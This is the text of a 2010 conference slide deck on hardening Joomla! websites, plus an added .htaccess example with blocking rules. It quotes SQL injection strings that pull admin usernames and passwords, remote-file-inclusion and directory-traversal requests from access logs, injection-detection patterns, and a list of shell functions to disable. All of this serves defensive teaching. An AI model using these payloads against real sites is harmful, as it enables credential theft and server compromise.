Security talk: Fortifying your Joomla! website

Security talk: Fortifying your Joomla! Website
Radek Suski, Sigsiu.NET GmbH
http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
(opening cartoon: http://dilbert.com/strips/comic/2004-01-11/)
Copyright 2010, Sigsiu.NET GmbH

Where to start?
Long before you go online:
- Choose the right hosting
- Choose the right components
- Inform yourself about good practices ....
- .... it means: you're right here :)
Choose the right host
- Apache 2
- PHP 5
- MySQL 5
- .htaccess support
- Safe Mode off!!!
- Register Globals off!!!
- Access via SFTP
- HTTPS/SSL support
Choose the right components
- Components published at the JED: http://extensions.joomla.org/
- Check the Vulnerable Extensions List regularly: http://docs.joomla.org/Vulnerable_Extensions_List

Installing Joomla!
Typical hack attempt
  ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users /*

The point is: be unconventional!
- Default username is "Admin"
- User ID of the first super admin is 62
  index.php?option=com_vulnurable...&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62 ...

Change the super admin user ID: http://sobi.it/SuperAdmin/62/
Main problem: we have to deal with kids with too much time
"A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit can cause you a great deal of grief" - source

Scriptkiddies
- Are sometimes randomly successful
- Are ambitious
- In most cases cause "only" heavy load. On a default Joomla! site:
  (~23 SQL queries executed + ~15 MB memory used + ~170,000 PHP instructions) x up to 100 hack attempts per minute from scriptkiddies
htaccess - powerful weapon
.htaccess (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess

Default Joomla! htaccess

Prevent access to PHP files
  195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1" 404 95 "Mozilla/5.0"

Forbid access from "dangerous" UA
  GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 "libwww-perl/5.829"
  GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1" 403 1029 "Mozilla/3.0 (compatible; Indy Library)"
  GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1" 403 1029 "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

Prevent most common SQL injections
  2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx&id=1/**/union/**/select/**/1,concat(username,0x3a,password)...
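The slides above say what to block; the deck's own .htaccess (the "Default Joomla! htaccess" slide) is an image that did not survive. The fragment below is an added example, not the deck's or the Joomla! project's file: it refuses direct PHP requests under extension directories, the user agents from the 403 samples, and the query-string patterns from the log lines, in the form a Joomla! 1.5-era site would use. It assumes mod_rewrite is loaded and AllowOverride permits these directives; the directory list and user-agent list are choices made here.

```apache
# Added example (not the deck's own file): .htaccess hardening for a Joomla! 1.5-era
# site, covering the three log samples above. Assumes mod_rewrite is enabled and
# that AllowOverride lets .htaccess use RewriteCond/RewriteRule.
RewriteEngine On

# 1. Prevent direct access to PHP files inside extension directories.
#    Joomla! serves everything through index.php / index2.php and the
#    administrator entry point, so a direct request such as
#    /administrator/components/com_remository/admin.remository.php is a scan, not a visitor.
RewriteCond %{REQUEST_URI} ^/(administrator/)?(components|modules|plugins|templates|libraries|includes)/.+\.php$ [NC]
RewriteRule .* - [F,L]

# 2. Forbid "dangerous" user agents. The strings come from the 403 lines above
#    (libwww-perl, Indy Library, Wget); extend the list from your own access log.
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|Indy\ Library|Wget) [NC]
RewriteRule .* - [F,L]

# 3. Block the most common injection strings. QUERY_STRING is matched undecoded,
#    so "+" and "/**/" separators and "%2e" appear literally. Patterns:
#    union ... select, concat(, mosConfig_* and GLOBALS overrides (as in the
#    shipped Joomla! htaccess.txt), directory traversal, and remote file inclusion.
RewriteCond %{QUERY_STRING} union(.*)select [NC,OR]
RewriteCond %{QUERY_STRING} concat\( [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} (\.\./|\%2e\%2e/)+ [NC,OR]
RewriteCond %{QUERY_STRING} =https?:// [NC]
RewriteRule .* - [F,L]
```

Replay your own access log against these rules before deploying: `union(.*)select` and `=http://` also match some legitimate search terms and redirect parameters, and an extension that exposes its own PHP endpoint under these directories needs an explicit exception placed before rule 1.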
Disclose as little information as possible

Admin panel log-in & FTP: who can see it?

HTTPS/SSL & SFTP
- Use SFTP instead of FTP
- Use HTTPS for log-in

HTTPS/SSL & SFTP - problems
- The provider has to offer SSH/SFTP
- The provider has to offer SSL or an SSL proxy
- An invalid SSL certificate throws an error in the browser
- Valid SSL certificates are expensive

HTTPS/SSL - problems
- Valid SSL certificates are expensive: https://www.startssl.com/
Username & password ... once again
- The username is almost as important as the password
- Automatically generated password: k5dRGCUxGs
- If we can articulate something, we can remember it: https://pass.sigsiu.net/

File permissions
- Very unlucky number: 777
php.ini
- Disable "dangerous" functions ??!!
  disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
- How can a function be dangerous ??
- Use open_basedir:
  open_basedir = /path/to/www
Is your computer safe?
"There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software." - Brian Teeman

But what if .... ?
Backup, backup, backup ..... and one more time: backup

Thank you for your attention!
http://www.Sigsiu.NET
https://shop.Sigsiu.NET
http://joomla.Sigsiu.NET
http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
